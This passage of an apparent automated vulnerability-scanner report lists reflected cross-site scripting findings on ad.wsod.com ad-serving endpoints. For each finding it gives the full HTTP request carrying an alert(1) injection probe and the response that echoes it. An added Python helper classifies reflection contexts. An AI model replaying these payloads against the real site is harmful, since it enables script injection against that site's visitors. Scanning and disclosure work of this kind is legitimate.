344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,4780581418'-alert(1)-'8b88db78e28&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.839.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to
...[SNIP]...

1.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd5c5'-alert(1)-'e83e60bd0c4 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204bd5c5'-alert(1)-'e83e60bd0c4&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:46:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:46:50 GMT; path=/
Set-Cookie: i_1=25:1456:434:106:0:42422:1300909610:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:46:50 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 905

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204bd5c5'-alert(1)-'e83e60bd0c4&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604
...[SNIP]...

1.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [Values parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 715c6'-alert(1)-'26a8514aef5 was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589715c6'-alert(1)-'26a8514aef5&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:47:32 GMT; path=/
Set-Cookie: i_1=25:1456:831:106:0:42422:1300909652:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:47:32 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 910

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589715c6'-alert(1)-'26a8514aef5&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.831.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out mor
...[SNIP]...

1.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b1e'-alert(1)-'4a27e6a9fe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&48b1e'-alert(1)-'4a27e6a9fe5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:48:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:48:54 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909734:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:48:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 912

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
3852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&48b1e'-alert(1)-'4a27e6a9fe5=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.839.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d00"-alert(1)-"e72bcd1c54a was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238e4d00"-alert(1)-"e72bcd1c54a&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909468**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238e4d00"-alert(1)-"e72bcd1c54a&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,454
...[SNIP]...

1.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the AdID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406cb"><script>alert(1)</script>5d4e736fc03 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238406cb"><script>alert(1)</script>5d4e736fc03&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238406cb"><script>alert(1)</script>5d4e736fc03&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,454
...[SNIP]...
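Findings 1.52 and 1.53 are distinguished only by the context the canary lands in: a double-quoted JavaScript string for the "-alert(1)-" probe, a double-quoted HTML attribute for the "><script>alert(1)</script> probe. Whether a probe executes depends on the innermost open quote at the reflection point, which is worth checking by hand when a scanner's label and its own response excerpt disagree. The following Python is an added example, not part of the report and not code from ad.wsod.com: a small classifier that reads a response fragment, finds the innermost open quote around the reflection point and says which of the two probes would run there. The four fragments it runs on are constructed to imitate the excerpts above (the document.write'd <scr'+'ipt> markup, the plain <a href> link, a genuine double-quoted string, and plain text); they are not copies of the server output, and the function names are assumptions of this example.

```python
"""
Added example (not part of the XSS.CX / Burp report, not ad.wsod.com code):
classify where a reflected canary sits in an HTML response and predict whether
the two probe shapes used in findings 1.52 and 1.53 would execute there.
"""

JS_STRING_PROBE = '"-alert(1)-"'             # needs a double-quoted JS string
ATTR_PROBE = '"><script>alert(1)</script>'   # needs a double-quoted attribute (or text)
CANARY = 'CANARY'


def _open_js_quote(script_text: str):
    """Return the quote character of an unterminated JS string literal, or None.
    Tracks ' " ` and backslash escapes; comments and regex literals are ignored,
    which is sufficient for the concatenated document.write() markup above."""
    in_str = None
    i = 0
    while i < len(script_text):
        ch = script_text[i]
        if in_str:
            if ch == '\\':
                i += 1                      # skip the escaped character
            elif ch == in_str:
                in_str = None
        elif ch in '\'"`':
            in_str = ch
        i += 1
    return in_str


def _open_attr_quote(tag_text: str):
    """Return the quote character of an unterminated attribute value, or None."""
    in_attr = None
    for ch in tag_text:
        if in_attr:
            if ch == in_attr:
                in_attr = None
        elif ch in '\'"':
            in_attr = ch
    return in_attr


def reflection_context(body: str, marker: str = CANARY) -> str:
    """Classify the context of the first occurrence of marker in body."""
    idx = body.find(marker)
    if idx < 0:
        return 'not_reflected'
    prefix = body[:idx].lower()
    script_open = prefix.rfind('<script')
    if script_open > prefix.rfind('</script'):
        # Inside an inline <script>: the HTML parser is in script-data state,
        # so only the JavaScript tokenizer's view of quotes matters here.
        script_text = body[prefix.find('>', script_open) + 1:idx]
        q = _open_js_quote(script_text)
        return {'"': 'js_string_dq', "'": 'js_string_sq', '`': 'js_template'}.get(q, 'js_code')
    lt, gt = prefix.rfind('<'), prefix.rfind('>')
    if lt > gt:                             # inside a tag: which attribute quote is open?
        q = _open_attr_quote(body[lt:idx])
        return {'"': 'html_attr_dq', "'": 'html_attr_sq'}.get(q, 'html_tag')
    return 'html_text'


def probe_executes(context: str, probe: str) -> bool:
    """Would this probe run as script if reflected unmodified in this context?"""
    if probe == JS_STRING_PROBE:
        return context == 'js_string_dq'
    if probe == ATTR_PROBE:
        return context in ('html_attr_dq', 'html_text')
    raise ValueError('unknown probe')


# Constructed fragments modelled on the report's response excerpts (not copies).
ATTR_FRAGMENT = (
    '<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442'
    '&AdID=483238CANARY&TargetID=5204" target="_blank">'
)
WRITE_FRAGMENT = (
    r'''<script type="text/javascript">document.write('<scr'+'ipt type="text/javascr'+'ipt" '''
    r'''src="'+wsod.proto+'//ad.wsod.com/embed/x?click=http://ads.cnn.com/event.ng/'''
    r'''Type=click&FlightID=351442&AdID=483238CANARY&TargetID=5204"><'+'/scr'+'ipt>');</script>'''
)
DQ_FRAGMENT = '<script>var adId = "483238CANARY"; track(adId);</script>'
TEXT_FRAGMENT = '<div>Ad 483238CANARY served</div>'


if __name__ == '__main__':
    for name, frag in [('attr', ATTR_FRAGMENT), ('write', WRITE_FRAGMENT),
                       ('dq', DQ_FRAGMENT), ('text', TEXT_FRAGMENT)]:
        ctx = reflection_context(frag)
        print(f'{name:6} {ctx:14} js-probe={probe_executes(ctx, JS_STRING_PROBE)} '
              f'attr-probe={probe_executes(ctx, ATTR_PROBE)}')
```

Run against the write fragment, the classifier reports js_string_sq: the canary is inside a single-quoted literal being concatenated into markup, so the "-alert(1)-" probe does not terminate the JavaScript string there, while the same canary inside the <a href="..."> fragment is html_attr_dq and the "><script> probe does break out. That is the distinction to verify by hand before accepting a JavaScript-string classification.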

1.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4786"-alert(1)-"4a71cf01353 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

Caveat: the response excerpt below shows the reflection inside the single-quoted literal ('//ad.wsod.com/embed/...') that is concatenated into <scr'+'ipt ... src="..."> markup. A double quote inside a '...' literal does not end the JavaScript string; it only closes the src attribute of the markup being written. Confirm in a browser before relying on the JavaScript-string classification; finding 1.55, which reflects the same parameter into a plain <a href="..."> attribute, is the reliable proof of concept for FlightID.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442f4786"-alert(1)-"4a71cf01353&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909462**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442f4786"-alert(1)-"4a71cf01353&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,452
...[SNIP]...

1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the FlightID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce41"><script>alert(1)</script>29b3681d162 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=3514423ce41"><script>alert(1)</script>29b3681d162&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=3514423ce41"><script>alert(1)</script>29b3681d162&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,452
...[SNIP]...

1.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb39%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5659937c937 was submitted in the REST URL parameter 2. This input was echoed as 4fb39"><script>alert(1)</script>5659937c937 in the application's response.

